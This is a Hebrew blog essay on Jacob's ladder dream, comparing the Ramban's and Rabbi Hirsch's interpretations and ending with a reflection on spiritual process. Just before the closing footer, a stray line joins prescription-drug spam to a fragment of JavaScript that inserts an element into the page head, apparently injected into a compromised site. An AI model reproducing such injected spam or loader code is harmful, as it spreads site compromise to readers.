תובנות חדשות בחלום סולם יעקב

בס”ד

חלום יעקב : מלאכי אלוקים עולים ויורדים בסולם/ מרדכי אפרתי

יעקב בורח מעשו ובדרך הוא חולם חלום .

הוא רואה סולם שבו מלאכי אלוקים עולים ויורדים ואז אלוקים “ניצב עליו” ומתגלה אליו ומבטיח לו שישמור אותו וירבה את זרעו ויתן לו את ארץ ישראל.

השאלה הנשאלת היא לשם מה הראה לו אלוקים את החלום הזה. מה הוא בא לסמל? הרי היה יכול לומר לו את כל ההבטחות ללא כל חלום ?

הרמב”ן  אומר שמטרת החלום הייתה ללמד את יעקב שאלוקים פועל בעולם באמצעות מלאכים והם יורדים לעולם ועושים את התפקיד שלהם ושוב עולים לקבל שליחות חדשה. (הקושי בפירוש זה מדוע לימד אותו את העיקרון הזה דוקא עכשיו כשהוא בורח מעשו).

בהמשך דבריו מביא הרמב”ן את דברי רבי אליעזר הגדול האומר שהסולם הוא ההיסטוריה של עם ישראל, כל שלב בסולם מסמל זמן (שנה, תקופה) והמלאכים העולים והיורדים מסמלים את העמים שיעלו לשלוט בעם ישראל ( בבל, מדי, יון,אדום) כיצד יעלו וישעבדו את ישראל וכיצד יפלו וירדו מדרגתם ואז מתגלה אליו אלוקים כשהוא עומד בראש הסולם (“ניצב עליו”: על הסולם) דבר האומר שכל ההיסטוריה, עליית המלכים ונפילתם ושיעבוד ישראל הכל מנוהל על ידו והוא זה שמעלה ומוריד אותם כמו בבות תיאטרון ומריונטות.

מאידך , הרש”ר הירש אומר שאלוקים רוצה להראות ליעקב את השוני בינו (ועם ישראל זרעו) לבין המלאכים. המלאכים עולים בסולם שראשו מגיע השמימה כלומר הם מחפשים את אלוקים בשמים דהיינו אלוקות ערטילאית המנותקת מהמציאות הגשמית בעוד שאלוקים מתגלה ליעקב דוקא כשהוא נמצא על האדמה במציאות החומרית ואלוקים “ניצב עליו” – על יעקב הנמצא במציאות המטריאליסטית , כלומר תפקידו של יעקב הוא להיות שונה מהמלאך, הוא  וזרעו  צריכים ויכולים למצוא את אלוקים במימדים הגשמיים של המציאות . עליהם לראות ולהרגיש את אלוקים בעסקים, בכסף, ברכוש, באוכל, בלבוש, בחיי החברה ,בקשר עם בני האדם, עם אשתו, עם משפחתו  ובכל רובדי החיים הארציים.

אם אכן יעקב ראה מלאכים עולים ויורדים ומדובר במלאכים ממש  מדוע המלאכים היו צריכים סולם כדי להגיע לשמים הרי במשק כנף אחד המלאך בשמים ולשם מה צריך סולם ?

אפשר לומר שהקב”ה רוצה ללמד את יעקב שהעיקר בחיים זה לא להגיע, לגמור ולסיים את המצווה, הספר והלימוד אלא העיקר הוא התהליך . המלאכים יכלו להגיע במשק כנף אחד אבל במקום זה הם עולים ויורדים כי העניין הוא לא להגיע אלא להיות תמיד בתהליך של עליה, בתהליך של “עולים ויורדים”, של “נפילות” בחיים ומתוכם שוב עליות ושוב נפילות אבל שוב עליה. העיקר הוא “התהליך” (להיות בתהליך של אמונה, מצווה, עשיית טוב) ולא ההספק.

  online prescription meds d.getElementsByTagName(‘head’)[0].appendChild(s);}

סגור לתגובות.

Scroll To Top